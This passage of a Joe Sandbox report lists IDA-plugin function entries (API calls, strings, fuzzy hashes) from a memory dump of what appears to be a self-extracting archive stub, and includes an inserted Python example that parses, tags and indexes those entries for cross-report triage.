                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 61e786808fef9d4e6bf322b62ae51206f2929a44a72c471ca6a2e14319f3bf5c
                                                • Instruction ID: 072c6ca26e6d3cba643a1343154cdc2c7e8f1f5a525f42b86d063f4a944e7f3a
                                                • Opcode Fuzzy Hash: 61e786808fef9d4e6bf322b62ae51206f2929a44a72c471ca6a2e14319f3bf5c
                                                • Instruction Fuzzy Hash: E512DF716447068FD728CF28C895BB9B7E0FB48308F508A7EE49AC7681E774A9D5CB41
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 089c84323ef3d92859125ab1944d4510da106b1f4bd5ca83d10ff8e08bc8ef48
                                                • Instruction ID: 11bdd635296e2fd64fca132c2f8389a27d9b56270fd18dd50ceeefcf3b078d98
                                                • Opcode Fuzzy Hash: 089c84323ef3d92859125ab1944d4510da106b1f4bd5ca83d10ff8e08bc8ef48
                                                • Instruction Fuzzy Hash: F5E17BB45083908FC305CF29D48096BBBF0EB9A701F4A099EF9D497352C735EA56DB62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 63677cbbfe3661a98981b0701213185b819074294746bae38b55e232714c16d5
                                                • Instruction ID: 88238095d936314552b07b30d5a03bd681790d02d0af5103b7d9f3f8bf8bc1ac
                                                • Opcode Fuzzy Hash: 63677cbbfe3661a98981b0701213185b819074294746bae38b55e232714c16d5
                                                • Instruction Fuzzy Hash: A49135713093424BDB25DE68D884BFE77D2EF90304F9009BCE98A87282DA74A9C58753
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5320738d42a697eb58e166e3866faffb0f32eb2b0c193a9c851ee279a30de4b9
                                                • Instruction ID: b0966fea6ca18eeff1ad493ed382cb64d0786fe1a160b80d547d9e5353dc80dd
                                                • Opcode Fuzzy Hash: 5320738d42a697eb58e166e3866faffb0f32eb2b0c193a9c851ee279a30de4b9
                                                • Instruction Fuzzy Hash: 47618D3160063892EE388AA87C937BE2FD4DF15345F1004DAE84FFF282DA119D51C396
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                • Instruction ID: 9c6b7b4b24961f456adf853d769519ac093a97e59c31049bed795351e40d2acb
                                                • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                • Instruction Fuzzy Hash: A85167212007B596DF349928BA96FFF2BD5DB02300F1809CAE94EC7682CF05ED459B56
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                APIs
                                                • _swprintf.LIBCMT ref: 00B13EEA
                                                  • Part of subcall function 00B0F6BA: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B0F6CD
                                                  • Part of subcall function 00B189ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00B4E088,?,00000007,00B133E2,?,?,00000050,5EA84158), ref: 00B18A0A
                                                • _strlen.LIBCMT ref: 00B13F0B
                                                • SetDlgItemTextW.USER32(?,00B4919C,?), ref: 00B13F64
                                                • GetWindowRect.USER32(?,?), ref: 00B13F9A
                                                • GetClientRect.USER32(?,?), ref: 00B13FA6
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00B14051
                                                • GetWindowRect.USER32(?,?), ref: 00B14081
                                                • SetWindowTextW.USER32(?,?), ref: 00B140B0
                                                • GetSystemMetrics.USER32(00000008), ref: 00B140B8
                                                • GetWindow.USER32(?,00000005), ref: 00B140C3
                                                • GetWindowRect.USER32(00000000,?), ref: 00B140F3
                                                • GetWindow.USER32(00000000,00000002), ref: 00B14165
                                                Similarity
                                                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                • String ID: $%s:$CAPTION$d
                                                • API String ID: 2407758923-2512411981
                                                APIs
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00B560E0,00000FA0,?,?,00B26185), ref: 00B261B3
                                                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00B26185), ref: 00B261BE
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00B26185), ref: 00B261CF
                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B261E1
                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B261EF
                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00B26185), ref: 00B26212
                                                • DeleteCriticalSection.KERNEL32(00B560E0,00000007,?,?,00B26185), ref: 00B26235
                                                • CloseHandle.KERNEL32(00000000,?,?,00B26185), ref: 00B26245
                                                Strings
                                                • SleepConditionVariableCS, xrefs: 00B261DB
                                                • WakeAllConditionVariable, xrefs: 00B261E7
                                                • kernel32.dll, xrefs: 00B261CA
                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B261B9
                                                Similarity
                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                • API String ID: 2565136772-3242537097
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 00B33816
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B333CE
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B333E0
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B333F2
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B33404
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B33416
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B33428
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B3343A
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B3344C
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B3345E
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B33470
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B33482
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B33494
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B334A6
                                                • _free.LIBCMT ref: 00B3380B
                                                  • Part of subcall function 00B303D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?), ref: 00B303EA
                                                  • Part of subcall function 00B303D4: GetLastError.KERNEL32(?,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?,?), ref: 00B303FC
                                                • _free.LIBCMT ref: 00B3382D
                                                • _free.LIBCMT ref: 00B33842
                                                • _free.LIBCMT ref: 00B3384D
                                                • _free.LIBCMT ref: 00B3386F
                                                • _free.LIBCMT ref: 00B33882
                                                • _free.LIBCMT ref: 00B33890
                                                • _free.LIBCMT ref: 00B3389B
                                                • _free.LIBCMT ref: 00B338D3
                                                • _free.LIBCMT ref: 00B338DA
                                                • _free.LIBCMT ref: 00B338F7
                                                • _free.LIBCMT ref: 00B3390F
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B1D919
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                • _wcslen.LIBCMT ref: 00B1D97B
                                                • _wcslen.LIBCMT ref: 00B1D99A
                                                • _wcslen.LIBCMT ref: 00B1D9B6
                                                • _strlen.LIBCMT ref: 00B1DA14
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,00B3D9F0,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 00B1DA2D
                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00B1DA54
                                                Similarity
                                                • API ID: _wcslen$Global$AllocCreateH_prolog3_Stream_strlen
                                                • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                • API String ID: 1185167184-1533471033
                                                APIs
                                                • GetWindow.USER32(?,00000005), ref: 00B237C4
                                                • GetClassNameW.USER32(00000000,?,00000080), ref: 00B237F0
                                                  • Part of subcall function 00B18DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00B10E3F,?,?,?,00000046,00B11ECE,00000046,?,exe,00000046), ref: 00B18DBA
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00B2380C
                                                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B23823
                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00B23837
                                                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B23860
                                                • DeleteObject.GDI32(00000000), ref: 00B23867
                                                • GetWindow.USER32(00000000,00000002), ref: 00B23870
                                                Similarity
                                                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                • String ID: STATIC
                                                • API String ID: 3820355801-1882779555
                                                APIs
                                                • _free.LIBCMT ref: 00B2FF25
                                                  • Part of subcall function 00B303D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?), ref: 00B303EA
                                                  • Part of subcall function 00B303D4: GetLastError.KERNEL32(?,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?,?), ref: 00B303FC
                                                • _free.LIBCMT ref: 00B2FF31
                                                • _free.LIBCMT ref: 00B2FF3C
                                                • _free.LIBCMT ref: 00B2FF47
                                                • _free.LIBCMT ref: 00B2FF52
                                                • _free.LIBCMT ref: 00B2FF5D
                                                • _free.LIBCMT ref: 00B2FF68
                                                • _free.LIBCMT ref: 00B2FF73
                                                • _free.LIBCMT ref: 00B2FF7E
                                                • _free.LIBCMT ref: 00B2FF8C
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 322700389-393685449
                                                • Opcode ID: 74144ed59dc5e176097c529b3850c62c0e6a41efaa407ab16d859eee778ff2b4
                                                • Instruction ID: a5115697f93604c6e375f8c1b4c66d28444ff8972013ee46eeeed8f5c42ec891
                                                • Opcode Fuzzy Hash: 74144ed59dc5e176097c529b3850c62c0e6a41efaa407ab16d859eee778ff2b4
                                                • Instruction Fuzzy Hash: 2FB16875800229EFCF15EFA4E9819AEBBF5FF08310F1445AAE80C6B212D731DA51DB91
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0D99A
                                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00B0D9BF
                                                • GetLongPathNameW.KERNEL32(?,?,?), ref: 00B0DA11
                                                • GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 00B0DA34
                                                • GetShortPathNameW.KERNEL32(?,?,?), ref: 00B0DA84
                                                • MoveFileW.KERNEL32(-00000040,-00000028), ref: 00B0DC9F
                                                • MoveFileW.KERNEL32(-00000028,-00000040), ref: 00B0DCEC
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: NamePath$FileLongMoveShort$H_prolog3__wcslen
                                                • String ID: rtmp
                                                • API String ID: 2388273531-870060881
                                                • Opcode ID: c61ca9b210c0a0a66f2e44d2fb913f76864d2f83c6d89c232da87ff477a1b5ef
                                                • Instruction ID: fc35128f88d7aa7366dbbf3dceda7e07e874b85eb003624e75e929322f00bf92
                                                • Opcode Fuzzy Hash: c61ca9b210c0a0a66f2e44d2fb913f76864d2f83c6d89c232da87ff477a1b5ef
                                                • Instruction Fuzzy Hash: C2B11470901258EACF24DBA8CC89BDDBBF9AF15305F5445E9E049B7291DB309B89CF60
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3__wcslen
                                                • String ID: .rar$exe$rar$sfx
                                                • API String ID: 3251556500-630704357
                                                • Opcode ID: e581a54a7712980ad0fe6cc537131b824513734a03ff4710d17f34e2fe935c3f
                                                • Instruction ID: 991f3601621e8f0382636aabc66a9af271ec2f1ec5e553d9b1b4c191d9a70efa
                                                • Opcode Fuzzy Hash: e581a54a7712980ad0fe6cc537131b824513734a03ff4710d17f34e2fe935c3f
                                                • Instruction Fuzzy Hash: E971E431A01714DBCB21DFA8C985AEDB7F4EF48710FA00999F581AB291DB7199D2CB90
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00B104AB,00B104AD,00000000,00000000,5EA84158,00000001,00000000,00000000,?,00B1038C,?,00000004,00B104AB,ROOT\CIMV2), ref: 00B25459
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00B104AB,?,00000000,00000000,?,?,00B1038C,?,00000004,00B104AB), ref: 00B254D4
                                                • SysAllocString.OLEAUT32(00000000), ref: 00B254DF
                                                • _com_issue_error.COMSUPP ref: 00B25508
                                                • _com_issue_error.COMSUPP ref: 00B25512
                                                • GetLastError.KERNEL32(80070057,5EA84158,00000001,00000000,00000000,?,00B1038C,?,00000004,00B104AB,ROOT\CIMV2), ref: 00B25517
                                                • _com_issue_error.COMSUPP ref: 00B2552A
                                                • GetLastError.KERNEL32(00000000,?,00B1038C,?,00000004,00B104AB,ROOT\CIMV2), ref: 00B25540
                                                • _com_issue_error.COMSUPP ref: 00B25553
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                • String ID:
                                                • API String ID: 1353541977-0
                                                • Opcode ID: e7517944c7823e7e9ede845b2fb2acb51c90075b14eb1fcb00803143a925f07e
                                                • Instruction ID: a8f407b622e6cc989103632738f38b3fe1f7dd7dea46fbd435de91c3d93858ab
                                                • Opcode Fuzzy Hash: e7517944c7823e7e9ede845b2fb2acb51c90075b14eb1fcb00803143a925f07e
                                                • Instruction Fuzzy Hash: B541FA71A00625ABC720DFA8EC45BAEBBE9EF48710F2042A9F51DE7350DB35D94087A5
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 00B10470
                                                  • Part of subcall function 00B10360: __EH_prolog3.LIBCMT ref: 00B10367
                                                • VariantClear.OLEAUT32(?), ref: 00B105FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3$ClearVariant
                                                • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                • API String ID: 4196654922-3505469590
                                                • Opcode ID: 0e2319444d5ca43cab944a72489ebea3cdd818102682decf70b580447799eff2
                                                • Instruction ID: 75094786d9c1bc265598d80a9919b4be25dfc6e900ad3a0ba2a63df2225cc6a3
                                                • Opcode Fuzzy Hash: 0e2319444d5ca43cab944a72489ebea3cdd818102682decf70b580447799eff2
                                                • Instruction Fuzzy Hash: 7B613D71A103199FDB14EFA4DC95AAFBBF9FF48710B544098E512B72A0CB70AD81CB60
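The entry above (WQL `SELECT * FROM Win32_OperatingSystem` against `ROOT\CIMV2`, reading `Name` and comparing with `Windows 10`) and the rename entry before it (GetLongPathNameW/GetShortPathNameW plus two MoveFileW calls, string `rtmp`) are typical of how the IDA-plugin output has to be read: per function, a list of direct and folded subcall APIs, the `$`-joined string literals, and the `API String ID`, whose second number is 0 whenever the String ID is empty (see the `776569668-0` entry earlier), so it is a content-derived key rather than an address. The following is an added example, not code from Joe Sandbox or from this report: a Python parser that turns these entries into records, tags each function from its API/string evidence, and indexes functions by `API String ID` so the same routine can be matched across reports. The sample input is constructed from two of the entries shown; the tag names and heuristics are this example's own.

```python
# Added example (not Joe Sandbox's or the report's own code): parse the IDA-plugin function
# entries rendered above, pivot on "API String ID", and attach triage tags of this example's own.
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass, field
# Constructed sample input in the layout of the report entries (two of the functions shown above).
SAMPLE = r"""
APIs
• __EH_prolog3.LIBCMT ref: 00B10470
  • Part of subcall function 00B10360: __EH_prolog3.LIBCMT ref: 00B10367
• VariantClear.OLEAUT32(?), ref: 00B105FA
Similarity
• API ID: H_prolog3$ClearVariant
• String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
• API String ID: 4196654922-3505469590
• Instruction Fuzzy Hash: 7B613D71A103199FDB14EFA4DC95AAFBBF9FF48710B544098E512B72A0CB70AD81CB60
APIs
• __EH_prolog3_GS.LIBCMT ref: 00B0D99A
• GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00B0D9BF
• MoveFileW.KERNEL32(-00000040,-00000028), ref: 00B0DC9F
  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
Similarity
• API ID: NamePath$FileLongMoveShort$H_prolog3__wcslen
• String ID: rtmp
• API String ID: 2388273531-870060881
• Instruction Fuzzy Hash: C2B11470901258EACF24DBA8CC89BDDBBF9AF15305F5445E9E049B7291DB309B89CF60
"""
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "<api>.<MODULE>(<args>), ref: <call-site>"; args and the comma are absent for CRT-internal calls
API_RE = re.compile(r"^(?P<name>[^\s.(]+)\.(?P<module>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s+(?P<rest>.*)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                        # call-site address as printed (hex)
    subcall_of: str | None = None   # callee address when the plugin folded a callee's APIs in

@dataclass
class FunctionEntry:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)   # remaining "Key: value" bullets
    def api_names(self) -> set[str]:
        return {a.name for a in self.apis if a.subcall_of is None}   # direct calls only

def parse_api_line(text: str) -> ApiCall | None:
    sub = SUBCALL_RE.match(text)
    m = API_RE.match(sub.group("rest") if sub else text)
    if not m:
        return None
    args = m.group("args")
    return ApiCall(m.group("name"), m.group("module"), args.split(",") if args else [],
                   m.group("ref"), sub.group("fn") if sub else None)

def parse_entries(report: str) -> list[FunctionEntry]:
    entries, section, cur = [], None, None
    for raw in report.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":              # each function entry opens with its APIs section
                cur = FunctionEntry()
                entries.append(cur)
            section = line
        elif cur is not None and line.startswith("•"):
            body = line.lstrip("•").strip()
            if section == "APIs":
                if call := parse_api_line(body):
                    cur.apis.append(call)
            elif ":" in body:
                key, _, value = body.partition(":")
                if key.strip() == "String ID":
                    # the plugin joins literals with "$"; a leading "$" (blank literal) gives an empty field
                    cur.strings = [s for s in value.strip().split("$") if s]
                else:
                    cur.fields[key.strip()] = value.strip()
    return entries

# Triage heuristics (this example's own): what the API/string evidence suggests the function does.
TAGS = {
    "wmi_query": lambda e: any(s.upper().startswith(("SELECT ", "ROOT\\")) for s in e.strings),
    "os_name_check": lambda e: any(s.startswith("Windows ") for s in e.strings) or "GetVersionExW" in e.api_names(),
    "file_rename": lambda e: "MoveFileW" in e.api_names(),
    "path_canonicalise": lambda e: bool({"GetLongPathNameW", "GetShortPathNameW", "GetFullPathNameW"} & e.api_names()),
}

def tag_entry(e: FunctionEntry) -> list[str]:
    return [name for name, pred in TAGS.items() if pred(e)]

def index_by_api_string_id(entries: list[FunctionEntry]) -> dict[str, list[tuple]]:
    """API String ID -> [(first call-site ref, Instruction Fuzzy Hash)], a content-derived pivot across reports."""
    idx = defaultdict(list)
    for e in entries:
        if sid := e.fields.get("API String ID"):
            idx[sid].append((e.apis[0].ref if e.apis else None, e.fields.get("Instruction Fuzzy Hash")))
    return dict(idx)
```

Feeding the whole IDA-plugin section of a report to `parse_entries` yields one record per function; `index_by_api_string_id` is the key to compare two reports, because call-site addresses such as 00B0D99A depend on where the module was mapped in this dump (offset 00B00000) while the API String ID is computed from the API and string content.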
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3_wcslen
                                                • String ID: $</p>$</style>$<br>$<style>
                                                • API String ID: 3746244732-3393513139
